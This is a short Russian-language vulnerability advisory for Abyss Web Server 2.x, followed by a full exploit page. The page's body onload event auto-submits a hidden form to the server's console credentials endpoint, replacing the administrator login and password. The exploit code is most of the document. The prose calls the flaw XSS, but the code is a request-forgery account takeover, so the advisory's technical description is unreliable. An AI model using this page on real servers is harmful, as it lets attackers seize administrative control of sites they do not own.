Программа: Abyss Web Server 2.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<html>
<body onload="document.forms[0].submit()">
<form method="post" action="http://localhost:9999/console/credentials">
<input type="hidden" name="/console/credentials/login"
value="new_username" />
<input type="hidden" name="/console/credentials/password/$pass1"
value="new_password" />
<input type="hidden" name="/console/credentials/password/$pass2"
value="new_password" />
<input type="hidden" name="/console/credentials/bok"
value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
</form>
</body>
</html>
